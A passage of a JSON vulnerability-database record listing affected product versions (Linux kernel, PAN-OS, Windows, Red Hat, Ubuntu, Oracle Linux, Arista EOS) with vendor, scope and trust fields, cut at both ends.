        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "extendible operating system 4.20.5.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.11"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel 3.9-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.5"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "extendible operating system 4.20.4f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.1"
      },
      {
        "model": "kernel 4.14-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1018030"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.10"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "18030"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.18"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "extendible operating system 4.20.4.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.73"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.13"
      },
      {
        "model": "windows rt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.1"
      },
      {
        "model": "windows server r2 for itanium-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.3"
      },
      {
        "model": "kernel 3.9-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.1"
      },
      {
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.4"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "extendible operating system 4.21.0f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.1.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.10"
      },
      {
        "model": "kernel 4.13-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "extendible operating system 4.20.7m",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.19"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.1.3"
      },
      {
        "model": "windows server r2 for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.3"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.9"
      },
      {
        "model": "extendible operating system 4.20.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.10"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.12"
      },
      {
        "model": "kernel 4.14.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.16-rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.6"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.8"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.4"
      },
      {
        "model": "windows server for x64-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.36"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.13"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.4"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20160"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "extendible operating system 4.20.6f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.0"
      },
      {
        "model": "linux esm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.11"
      },
      {
        "model": "extendible operating system 4.20.8m",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.8"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.17"
      },
      {
        "model": "windows server for itanium-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "windows for 32-bit systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.3"
      },
      {
        "model": "kernel 3.9-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "windows for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.14"
      },
      {
        "model": "kernel 4.12-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.3"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.10"
      },
      {
        "model": "enterprise mrg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.4"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.2"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.9"
      },
      {
        "model": "windows server for 32-bit systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.79"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.1"
      },
      {
        "model": "extendible operating system 4.20.2f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.7"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.5"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.3"
      },
      {
        "model": "extendible operating system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arista",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.12"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.0.10"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "18.04"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "kernel 4.15-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.1"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "16.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "extendible operating system 4.20.3f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017090"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "8.1.4"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.7"
      },
      {
        "model": "extendible operating system 4.20.5.2f",
        "scope": null,
        "trust": 0.3,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "pan-os",
        "scope": "ne",
